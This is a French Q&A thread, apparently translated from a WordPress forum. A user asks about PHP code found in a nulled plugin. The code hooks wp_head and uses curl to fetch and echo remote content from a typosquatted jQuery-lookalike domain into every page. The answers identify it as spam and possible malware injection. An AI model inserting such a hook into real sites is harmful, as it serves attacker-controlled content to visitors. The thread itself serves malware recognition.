J'ai trouvé cela dans un plugin. Qu'est ce que ça fait? est-ce dangereux?

17

J'ai trouvé cela dans un plugin. Qu'est ce que ça fait? est-ce dangereux?

add_action('admin_enqueue_scripts', 'pw_load_scripts');
if (!function_exists('wp__head'){
function wp__head() {
    if(function_exists('curl_init')) { 
        $ch = curl_init();
        curl_setopt($ch,CURLOPT_URL,"http://www.jqury.net/?1"); 
        curl_setopt($ch,CURLOPT_RETURNTRANSFER,1); 
        curl_setopt($ch, CURLOPT_REFERER, $_SERVER['HTTP_HOST']);
        curl_setopt($ch,CURLOPT_CONNECTTIMEOUT,10); 
        $jquery = curl_exec($ch);  
        curl_close($ch); 
        echo "$jquery";
    }
}
add_action('wp_head', 'wp__head');
}
plugins  wp-admin  security  curl 
Sofia Rose
source
5
De quel plugin s'agit-il?
Daniel
Avez-vous obtenu le plugin sur le site officiel de WP?
Ce brésilien Guy
1
C'était dans un plugin qu'un de mes clients voulait que j'exécute sur mon installation réseau. Le plugin voulait exécuter ceci dans wp-admin. Après avoir lu cela, je lui ai demandé d'où cela venait. C'est un plugin annulé d'un torrent. La réponse courte était erm NO xXx
Sofia Rose

Réponses:

16

Il charge un bloc de balisage contenant du spam (j'ai pensé à publier un peu de la source mais je ne veux en aucun cas annoncer le contenu) à partir d'un domaine qui est une faute d'orthographe proche du domaine http://jquery.com/- - utilisé par jQuery , une bibliothèque Javascript réputée et populaire et que WordPress inclut dans le Core. Je pense que l'idée est de sembler charger cette bibliothèque, alors qu'en fait, charger quelque chose de très différent.

Et il tente par d'autres moyens de sembler charger jQuery. Remarquez le nom de la variable $jquery.

Il peut également tenter de charger des scripts malveillants. Je n'ai pas vérifié. Je l' appellerais certainement dangereux, d'autant plus que le contenu de cette page peut changer à tout moment si les contrôleurs de domaine en ont envie.

Au mieux, cela va endommager votre site car les moteurs de recherche regardent les sites qui propagent du spam.

Ne l'utilisez pas. Il ne fait rien de bénéfique pour vous ou pour toute autre personne sur le Web autre que les personnes qui gèrent le site. Si vous l'avez trouvé sur un site réputé, signalez-le-leur.

s_ha_dum
source
7

Oui, c'est un code dangereux qui charge du contenu à partir d'un site de spam.

Vous n'avez pas nommé le plugin, mais si vous avez trouvé ce code après qu'il a été installé sur votre site Web, il est possible que le code du plugin ne provienne pas du développeur comme celui-ci, mais a été piraté après son installation. Si tel est le cas, vous pourriez trouver le code malveillant sur plus de votre site Web que juste ce plugin.

Vérifiez le code du plugin téléchargé d'où que vous ayez obtenu le plugin à l'origine, et voyez si ce code malveillant était là à l'origine. Sinon, votre site a été piraté. Si vous déterminez que c'est le cas, lisez cet article du Codex .

Ben Miller - Rétablir Monica
source
3
C'était dans un plugin qu'un de mes clients voulait que j'exécute sur mon installation réseau. Le plugin voulait exécuter ceci dans wp-admin. Après avoir lu cela, je lui ai demandé d'où cela venait. C'est un plugin annulé d'un torrent. La réponse courte était erm NO xXx
Sofia Rose
En utilisant notre site, vous reconnaissez avoir lu et compris notre politique liée aux cookies et notre politique de confidentialité.
Licensed under cc by-sa 3.0 with attribution required.